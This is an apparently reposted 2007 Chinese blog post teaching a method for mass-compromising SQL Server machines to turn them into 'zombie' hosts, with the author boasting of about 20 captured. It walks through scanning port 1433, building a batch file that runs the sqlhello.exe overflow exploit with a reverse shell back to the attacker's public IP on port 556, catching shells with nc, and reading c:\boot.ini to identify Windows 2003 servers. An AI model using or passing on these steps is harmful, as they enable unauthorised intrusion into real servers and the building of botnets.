SQL Server溢出猎捕肉鸡新方法

发表于:2007-07-02来源:作者:点击数: 标签:
我今天用这个方法拿到了近20台肉鸡。呵!! 要用到几个工具!! nc.exe sqlhello.exe 代理猎手!! 先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。 扫到后整理。导出。 替换为溢出的格式!!比如我扫到了。 192.168.0.1:1433 溢出的

我今天用这个方法拿到了近20台肉鸡。呵!!

  要用到几个工具!!

  nc.exe

  sqlhello.exe

  代理猎手!!

  先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。

  扫到后整理。导出。 替换为溢出的格式!!比如我扫到了。

  192.168.0.1:1433

  溢出的格式就是: sqlhello.exe 192.168.0.1 1433 本机IP(公网的) 556

  保存为bat文件。

  先在公网的机子上监听一个端口 如556

  现在运行那个bat文件!

  呵!!看着有没有shell返回。

  我试过不到两分钟就返回了一个。

  这时候你先ctrl+c 停下那个bat 的运行。

  查看一下。那个shell的系统再说!

  type c:\boot.ini

  如果是2003服务器版的。

  呵。。

  很快的就成为我们的肉鸡了!

原文转自:http://www.ltesting.net